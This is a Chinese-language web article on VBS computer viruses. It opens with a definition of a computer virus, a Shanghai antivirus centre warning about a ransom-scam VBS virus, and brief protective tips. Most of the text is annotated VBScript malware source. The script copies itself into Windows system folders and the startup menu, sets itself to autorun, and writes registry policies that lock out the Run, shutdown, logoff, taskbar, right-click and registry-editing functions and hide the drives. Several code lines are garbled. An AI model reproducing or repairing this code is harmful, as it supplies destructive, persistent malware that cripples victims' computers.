計算機病毒，是指編制或者在計算機程序中插入的破壞計算機功能或者毀壞數(shù)據(jù)，影響計算機使用，并能自我復(fù)制的一組計算機指令或者程序代碼。這是目前官方最權(quán)威的關(guān)于計算機病毒的定義，此定義也被通行的《計算機病毒防治產(chǎn)品評級準(zhǔn)則》的國家標(biāo)準(zhǔn)所采納。以下是學(xué)習(xí)啦網(wǎng)小編為大家整理的關(guān)于vbs電腦病毒代碼的相關(guān)知識，希望對大家有所幫助!

　　上海計算機病毒防范服務(wù)中心提醒，本周需防范一種在網(wǎng)上流行的“VBS病毒”(Virus.VBS.d)，該病毒不但導(dǎo)致多種殺毒軟件不能運行，而且還會彈出“解毒號碼”等欺詐信息，要求被害用戶向指定賬戶匯款，反病毒專家提醒用戶不要被這種欺詐信息迷惑。

　　據(jù)介紹，這種病毒可以導(dǎo)致多種殺毒軟件或工具不能正常運行。更值得注意的是，當(dāng)病毒感染的文件數(shù)超過2000個，會彈出對話框提示信息，提示內(nèi)容為：“您已有超過2000個文件被感染!不過請放心，此病毒很容易被清除!請聯(lián)系418465***!”反病毒專家分析，這個號碼是QQ號，受害用戶一旦加入這個號碼，會被要求向指定賬戶匯款。專家提醒這通常是欺詐行為，受害用戶要以正常方式殺毒，不要輕信這種欺詐信息。

　　專家建議，平時用戶上網(wǎng)時要開啟防病毒軟件的實時監(jiān)控功能，并關(guān)閉U盤的“自動播放功能”。用戶可針對自己計算機安裝的操作系統(tǒng)，找到相應(yīng)的安全漏洞補丁，下載并安裝。以遏制利用這些漏洞進行傳播的病毒，減少病毒給計算機用戶帶來的危害。

　　on error resume next

　　set fs=createobject("ing.filesystemobject" '創(chuàng)建一個能與操作系統(tǒng)溝通的對象,再利用該對象的各種方法對注冊表進行操作

　　set dir1=fs.getspecialfolder(0) '獲取windows/winnt文件夾位置

　　set dir2=fs.getspecialfolder(1) '獲取system32/system文件夾位置

　　set so=createobject("ing.filesystemobject"

　　dim r '定義一個變量

　　set r=createobject("w.shell"

　　so.getfile(w.fullname).copy(dir1&"\win32system.vbs" '復(fù)制病毒副本到windows/winnt文件夾位置

　　so.getfile(w.fullname).copy(dir2&"\win32system.vbs" '復(fù)制病毒副本到system32/system文件夾位置

　　so.getfile(w.fullname).copy(dir1&"\start menu\programs\啟動\win32system.vbs" '復(fù)制病毒副本到start menu啟動菜單

　　'下面是對注冊表的惡意修改和簡單的依靠oe傳播

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注冊表，禁止“運行”菜單

　　r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注冊表，禁止“關(guān)閉”菜單

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注冊表，隱藏所有邏輯盤符

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注冊表，禁止注冊表編輯

　　r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注冊表，禁止開機注冊表掃描

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注冊表，禁止“注銷”菜單

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注冊表，禁止ms-dos實模式

　　r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注冊表，使這個腳本本身開機自動運行

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注冊表，禁止顯示桌面圖標(biāo)

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注冊表，禁止純dos模式

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注冊表，禁止“任務(wù)欄和開始”菜單

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注冊表，禁止右鍵菜單